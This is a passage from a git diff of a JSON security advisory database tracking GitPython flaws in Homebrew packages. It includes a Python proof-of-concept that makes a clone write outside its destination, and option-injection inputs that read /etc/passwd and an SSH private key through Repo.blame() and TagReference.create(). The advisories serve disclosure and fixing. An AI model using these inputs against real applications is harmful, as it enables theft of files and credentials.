`Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.\n- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.\n- Verdict: no concrete blocker found. **CONFIRMED.**\n\n## Remediation\nAdd `\"--separate-git-dir\"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.\n\n## Confidence\nHigh. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.\n\n\n## Proof-of-Concept source (`gitpython-001-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in\nunsafe_git_clone_options, so it reaches `git clone` unguarded and writes a\nfull git directory (config, hooks/, objects/, refs/, ...) to an\nattacker-controlled path OUTSIDE the intended destination directory, with\nallow_unsafe_options left at its default of False.\n\nRun against the GitPython source tree under test, e.g.:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-001-poc.py \n\nBenign: only writes/reads inside the given workdir. No destructive/exfiltrating\npayload. Exits non-zero and prints \"NOT VULNERABLE\" if the guard blocks the option\nor the write does not escape the destination directory.\n\"\"\"\nimport os\nimport sys\nimport subprocess\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-001-poc\"\n src = os.path.join(workdir, \"src\")\n dest = os.path.join(workdir, \"dest\")\n sentinel_dir = os.path.join(workdir, \"OUTSIDE_SENTINEL\")\n target_gitdir = os.path.join(sentinel_dir, \"redirected.git\")\n\n for p in (src, dest, sentinel_dir):\n os.makedirs(p, exist_ok=True)\n\n # Minimal benign source repo to clone from.\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", src], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.name\", \"Test\"], check=True)\n with open(os.path.join(src, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n subprocess.run([\"git\", \"-C\", src, \"add\", \"file.txt\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n\n print(\"unsafe_git_clone_options =\", git.Repo.unsafe_git_clone_options)\n assert \"--separate-git-dir\" not in git.Repo.unsafe_git_clone_options, (\n \"guard now includes --separate-git-dir; PoC no longer applicable, target patched\"\n )\n\n try:\n repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)\n except git.exc.UnsafeOptionError as e:\n print(\"NOT VULNERABLE: blocked by UnsafeOptionError:\", e)\n sys.exit(1)\n\n wrote_outside = os.path.isdir(os.path.join(target_gitdir, \"hooks\")) and os.path.isfile(\n os.path.join(target_gitdir, \"config\")\n )\n gitlink_points_outside = False\n with open(os.path.join(dest, \".git\")) as f:\n gitlink = f.read().strip()\n gitlink_points_outside = target_gitdir in gitlink\n\n print(\"repo.git_dir =\", repo.git_dir)\n print(\"wrote git directory outside dest (sentinel) =\", wrote_outside)\n print(\"dest/.git gitlink points outside dest =\", gitlink_points_outside)\n\n if wrote_outside and gitlink_points_outside:\n print(\"VULNERABLE: git directory created at attacker-controlled path \"\n f\"outside the clone destination: {target_gitdir}\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: sentinel not observed\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78677" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2210" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/b68afff45af0f49e79a3e2d2162018986b37ad5d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3787.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-78678.json b/advisories/BREW-tartufo-CVE-2026-78678.json index 6e12181d45..4a15d84ac3 100644 --- a/advisories/BREW-tartufo-CVE-2026-78678.json +++ b/advisories/BREW-tartufo-CVE-2026-78678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-78678", "published": "2026-09-04T10:12:20Z", - "modified": "2026-09-05T10:16:40Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "PYSEC-2026-3788", "CVE-2026-78678", @@ -52,21 +52,34 @@ } ] }, - "details": "GitPython versions before 3.1.59 contain an incomplete denylist in the unsafe_git_revision_options guard that omits --contents and -S options, allowing attackers to read arbitrary files by passing these options to Repo.blame(). Attackers can supply revision values like --contents=/etc/passwd to leak file contents through the blame result returned to the caller.", + "summary": "GitPython: Incomplete unsafe_git_revision_options denylist omits --contents/-S, enabling arbitrary file read via Repo.blame()", + "details": "## Summary\n`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents ` and `-S `, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).\n\n## Root Cause\n`unsafe_git_revision_options = [\"--output\",\"-o\"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.\n\n## Impact\nArbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nresult = repo.blame(\"--contents=/etc/passwd\", \"a.txt\")\n# result rows carry the victim file's line text\n```\n\n## Attack Chain\n1. Entry: app calls `repo.blame(rev, file)` with attacker `rev=\"--contents=/etc/passwd\"` (or kwarg `contents=\"/etc/passwd\"`, or `-S`).\n2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `[\"--output\",\"-o\"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.\n3. Sink: `self.git.blame(rev, \"--\", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=','HEAD','--','a.txt']`.\n4. Impact: blame result rows carry the victim file's line text.\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.\n\n## Affected Versions\n`GitPython <= 3.1.58` (denylist present verbatim on the latest release tag).\n\n## Suggested Fix\nPrefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule \"the option takes a filesystem path\" rather than \"the option writes output\".\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", "severity": [ { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78678" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3788.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-78679.json b/advisories/BREW-tartufo-CVE-2026-78679.json new file mode 100644 index 0000000000..31e67e8232 --- /dev/null +++ b/advisories/BREW-tartufo-CVE-2026-78679.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-tartufo-CVE-2026-78679", + "published": "2026-09-10T21:09:42Z", + "modified": "2026-09-10T21:09:42Z", + "upstream": [ + "GHSA-3wxw-xv34-2frg", + "CVE-2026-78679", + "PYSEC-2026-3837" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "tartufo", + "purl": "pkg:brew/tartufo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "6.0.0_7" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.1.59", + "resource": "gitpython", + "resource_purl": "pkg:pypi/gitpython@3.1.61" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "gitpython", + "subject_version": "3.1.61", + "key": "pkg:pypi/gitpython@3.1.61", + "resource": "gitpython" + } + ] + }, + "summary": "GitPython: TagReference.create positional reference bypasses kwargs-only --file guard, enabling arbitrary file read (incomplete fix of 3af0c251)", + "details": "## Summary\n`TagReference.create()` forwards a caller-influenced positional `reference` value into `git tag` without it ever being inspected by the unsafe-option guard, allowing an arbitrary file read (the file's contents are returned in-band as the annotated tag message). This is an incomplete-fix bypass of commit `3af0c251` (the fix for GHSA-3f7w-8rr8-f37f's tag instance).\n\n## Root Cause\nThe fix `3af0c251` added `unsafe_git_tag_options = [\"--file\",\"-F\"]` and a guard call, but the guard is `Git.check_unsafe_options(options=Git._option_candidates([], kwargs), unsafe_options=...)` at `git/refs/tag.py:139` — it passes an EMPTY args list and inspects **kwargs only**. The dangerous values `path` and `reference` are POSITIONALS (`args = (path, reference)`, tag.py:156), placed before any `--`. A user-influenced `reference=\"--file=\"` therefore reaches `git tag` as the exact `--file` option the fix intended to block, creating an annotated tag whose message is the file's contents.\n\n## Impact\nArbitrary local file read at the privileges of the host process; contents returned in-band via `tagref.tag.message`. Requires the embedding application to forward a caller-influenced `reference` value into `TagReference.create()` (pure VALUE control — the CVE-2026-42215 threat model). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nfrom git import TagReference\nt = TagReference.create(repo, \"vpwn\", reference=\"--file=/home/app/.ssh/id_rsa\")\nprint(t.tag.message) # contents of the file\n```\n\n## Attack Chain\n1. Entry: app calls `TagReference.create(repo, name, reference=)` with `reference=\"--file=/home/app/.ssh/id_rsa\"`.\n2. Check: `Git.check_unsafe_options(_option_candidates([], kwargs), [\"--file\",\"-F\"])` @ tag.py:137-141. Guard: denylist includes `--file`/`-F`. Bypass proof: `_option_candidates` receives `args=[]` → the positional `reference` is never a candidate (the kwarg spelling `file=\"…\"` IS blocked; only the positional escapes).\n3. Sink: `repo.git.tag(*args, **kwargs)` @ tag.py:158 → no `--`. argv (observed): `['git','tag','-f','vpwn','--file=']`.\n4. Impact: annotated tag created; `tagref.tag.message` == file contents (arbitrary file read).\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, git 2.43.0, default `allow_unsafe_options=False`): `TagReference.create(repo,'vp','--file=')` → PASSED; `tag.message == 'GATE_SECRET_LINE_A\\nGATE_SECRET_LINE_B'`. Control: `TagReference.create(..., file='')` → `UnsafeOptionError: --file is not allowed`. Fix-commit read: `3af0c251` adds `_option_candidates([], kwargs)` (empty args → positional never a candidate).\n\n## Affected Versions\n`GitPython <= 3.1.58` (sink present verbatim on the latest release tag; `git diff 3.1.57..HEAD` touches only test files).\n\n## Suggested Fix\nInclude the positional `reference` (and `path`) in the option-candidate list passed to `check_unsafe_options`, or place a `--` separator before the positional arguments in `TagReference.create()`.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-3wxw-xv34-2frg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78679" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2208" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/1b0d2d9b91575f7db44ef4ff58ac37fc9335e5f6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-tagreference-create" + } + ] +} diff --git a/advisories/BREW-volk-CVE-2010-2480.json b/advisories/BREW-volk-CVE-2010-2480.json index bdf25710fe..148337da65 100644 --- a/advisories/BREW-volk-CVE-2010-2480.json +++ b/advisories/BREW-volk-CVE-2010-2480.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-volk-CVE-2010-2480", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:24Z", "upstream": [ "GHSA-7q8x-38mc-p84f", "CVE-2010-2480", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-volk-CVE-2022-40023.json b/advisories/BREW-volk-CVE-2022-40023.json index f76d797bf6..e13782eca1 100644 --- a/advisories/BREW-volk-CVE-2022-40023.json +++ b/advisories/BREW-volk-CVE-2022-40023.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-volk-CVE-2022-40023", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:24Z", "upstream": [ "GHSA-v973-fxgf-6xhp", "CVE-2022-40023", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-volk-CVE-2026-41205.json b/advisories/BREW-volk-CVE-2026-41205.json index 37092a86d0..18a4c35e6d 100644 --- a/advisories/BREW-volk-CVE-2026-41205.json +++ b/advisories/BREW-volk-CVE-2026-41205.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-volk-CVE-2026-41205", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:24Z", "upstream": [ "GHSA-v92g-xgxw-vvmm", "CVE-2026-41205", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-volk-CVE-2026-44307.json b/advisories/BREW-volk-CVE-2026-44307.json index d14eebdc68..7296c4e5f6 100644 --- a/advisories/BREW-volk-CVE-2026-44307.json +++ b/advisories/BREW-volk-CVE-2026-44307.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-volk-CVE-2026-44307", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:24Z", "upstream": [ "GHSA-2h4p-vjrc-8xpq", "CVE-2026-44307", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-west-CVE-2017-18342.json b/advisories/BREW-west-CVE-2017-18342.json index 12d3b11675..fda0121ca5 100644 --- a/advisories/BREW-west-CVE-2017-18342.json +++ b/advisories/BREW-west-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-west-CVE-2017-18342", "published": "2026-08-13T17:52:04Z", - "modified": "2026-08-13T17:52:04Z", + "modified": "2026-09-10T21:24:20Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-west-CVE-2019-20477.json b/advisories/BREW-west-CVE-2019-20477.json index 59ddf2c954..d87a527f77 100644 --- a/advisories/BREW-west-CVE-2019-20477.json +++ b/advisories/BREW-west-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-west-CVE-2019-20477", "published": "2026-08-13T17:52:04Z", - "modified": "2026-08-13T17:52:04Z", + "modified": "2026-09-10T21:24:20Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-west-CVE-2020-14343.json b/advisories/BREW-west-CVE-2020-14343.json index 476ba3db9c..9068d3581f 100644 --- a/advisories/BREW-west-CVE-2020-14343.json +++ b/advisories/BREW-west-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-west-CVE-2020-14343", "published": "2026-08-13T17:52:04Z", - "modified": "2026-08-13T17:52:04Z", + "modified": "2026-09-10T21:24:20Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-west-CVE-2020-1747.json b/advisories/BREW-west-CVE-2020-1747.json index 57789a2881..6a7439aae9 100644 --- a/advisories/BREW-west-CVE-2020-1747.json +++ b/advisories/BREW-west-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-west-CVE-2020-1747", "published": "2026-08-13T17:52:04Z", - "modified": "2026-08-13T17:52:04Z", + "modified": "2026-09-10T21:24:20Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI",